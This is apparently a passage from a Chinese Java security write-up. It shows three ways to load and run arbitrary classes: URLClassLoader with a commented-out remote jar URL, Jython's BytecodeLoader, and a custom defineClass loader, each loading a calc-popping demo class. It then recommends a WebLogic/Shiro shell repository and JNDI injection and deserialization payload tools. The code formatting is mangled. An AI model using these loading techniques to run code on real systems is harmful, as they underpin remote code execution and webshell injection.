package org.chabug.loader;
import java.net.URL;import java.net.URLClassLoader;
public class URLClassLoaderDemo {    public static void main(String[] args) throws Exception {//        URL url = new URL("https://baidu.com/cmd.jar");   // 也可以加载远程jar        URL url = new URL("file:///d:/calc.jar");
        // 创建URLClassLoader对象，并加载远程jar包        URLClassLoader ucl = new URLClassLoader(new URL[]{url});                // 通过URLClassLoader加载jar包        Class<?> aClass = ucl.loadClass("org.chabug.demo.Calc");        aClass.newInstance();    }}

jar包制作命令为

package org.chabug.loader;
import org.python.util.PythonInterpreter;
import java.io.ByteArrayOutputStream;import java.io.File;import java.io.FileInputStream;
public class BytecodeLoaderLoader {    public static void main(String[] args) throws Exception {        String className = "org.chabug.demo.Calc";        byte[] bytes = getBytesByFile("E:\code\java\JavaSerialize\target\classes\org\chabug\demo\Calc.class");        String classBytes = "";        for (byte b : bytes) {            classBytes += String.format("%s%s", b, ",");        }        String s = String.format("from org.python.core import BytecodeLoader;n" +                "from jarray import arrayn" +                "myList = [%s]n" +                "bb = array( myList, 'b')n" +                "BytecodeLoader.makeClass("%s",None,bb).getConstructor([]).newInstance([]);", classBytes, className);        PythonInterpreter instance = PythonInterpreter.class.getConstructor(null).newInstance();        instance.exec(s);    }
    public static byte[] getBytesByFile(String pathStr) {        File file = new File(pathStr);        try {            FileInputStream fis = new FileInputStream(file);            ByteArrayOutputStream bos = new ByteArrayOutputStream(1000);            byte[] b = new byte[1000];            int n;            while ((n = fis.read(b)) != -1) {                bos.write(b, 0, n);            }            fis.close();            byte[] data = bos.toByteArray();            bos.close();            return data;        } catch (Exception e) {            e.printStackTrace();        }        return null;    }}

三、自定义ClassLoader

package org.chabug.loader;
import static org.chabug.loader.BytecodeLoaderLoader.getBytesByFile;
public class MyLoader extends ClassLoader {    public static String className = "org.chabug.demo.Calc";    public static byte[] bytes = getBytesByFile("E:\code\java\JavaSerialize\target\classes\org\chabug\demo\Calc.class");
    public static void main(String[] args) throws Exception {        new MyLoader().loadClass(className).newInstance();    }
    @Override    public Class<?> findClass(String name) throws ClassNotFoundException {        // 只处理TestHelloWorld类        if (name.equals(className)) {            // 调用JVM的native方法定义TestHelloWorld类            return defineClass(className, bytes, 0, bytes.length);        }
        return super.findClass(name);    }}

四、原文链接

https://github.com/Y4er/WebLogic-Shiro-shell

五、相关推荐

JNDI-Injection-Exploit-Plus

是一款JNDI注入利用工具，可以生成JNDI链接并启动后端相关服务

是一款反序列化Payload生成工具（ 包含50+ Gadgets链，比ysoserial还多出10+ ）